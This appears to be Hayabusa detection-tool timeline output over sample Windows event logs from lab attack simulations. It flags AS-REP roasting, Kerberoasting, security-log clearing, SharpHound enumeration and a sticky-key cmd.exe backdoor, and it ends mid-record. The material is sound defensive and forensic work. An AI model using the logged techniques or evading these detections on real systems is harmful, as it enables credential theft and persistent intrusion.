Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54633 : LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54635 : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.2 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.980 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54374 : LogonID: 0xc712f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: 192.168.1.100 : Port: 54375 : LogonID: 0xc7142b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54376 : LogonID: 0xc714d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54379 : LogonID: 0xc7313f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54388 : LogonID: 0xc7adb8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54389 : LogonID: 0xc7ae25,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,informational,NTLM Logon to Local Account,User: Alice : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Alice : Workstation: : IP Address: 192.168.1.200 : Port: 40316 : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.200 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL : Service: sql101 : IP Address: ::ffff:192.168.1.200 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Alice : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx -2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx -2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx -2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62173 : LogonID: 0x88f313a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62188 : LogonID: 0x88f3141d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62190 : LogonID: 0x88f31435,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62194 : LogonID: 0x88f31447,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62169 : LogonID: 0x61e27259,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62167 : LogonID: 0x5a4cc2f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62170 : LogonID: 0xbe8573e4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62182 : LogonID: 0x61e27296,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62175 : LogonID: 0x5a4cc329,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62178 : LogonID: 0x61e272a9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62179 : LogonID: 0x5a4cc34a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62180 : LogonID: 0xbe857415,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62184 : LogonID: 0xbe85742e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62168 : LogonID: 0x22c8a454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.689 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62172 : LogonID: 0x3a7fd720,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62183 : LogonID: 0x5a4cc36c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62187 : LogonID: 0x61e272d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62186 : LogonID: 0xbe857459,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62189 : LogonID: 0x3a7fd78b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62193 : LogonID: 0x3a7fd7a6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62192 : LogonID: 0x22c8a4c2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62191 : LogonID: 0x3a7fd7ba,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62195 : LogonID: 0x22c8a4dc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62196 : LogonID: 0x22c8a4f7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62197 : LogonID: 0x2a1f27d0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62198 : LogonID: 0x2a1f27f0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62199 : LogonID: 0x2a1f2809,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62200 : LogonID: 0x2a1f281b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62211 : LogonID: 0x222004fb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62209 : LogonID: 0x258b9e7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62219 : LogonID: 0x22200531,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62222 : LogonID: 0x2220054d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62223 : LogonID: 0x22200565,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62210 : LogonID: 0x213dfbef,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62208 : LogonID: 0x28da8a22,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62218 : LogonID: 0x213dfc1c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62216 : LogonID: 0x28da8a5a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62217 : LogonID: 0x28da8a76,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62220 : LogonID: 0x28da8a88,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62221 : LogonID: 0x213dfc3f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62224 : LogonID: 0x213dfc4d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62234 : LogonID: 0x258b9ee5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62235 : LogonID: 0x258b9ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62236 : LogonID: 0x258b9efd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\windows\system32\cmd.exe sethc.exe 211 : Path: C:\Windows\System32\cmd.exe : User: OFFSEC\admmig : Parent Command: winlogon.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx -2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,Sticky Key Like Backdoor 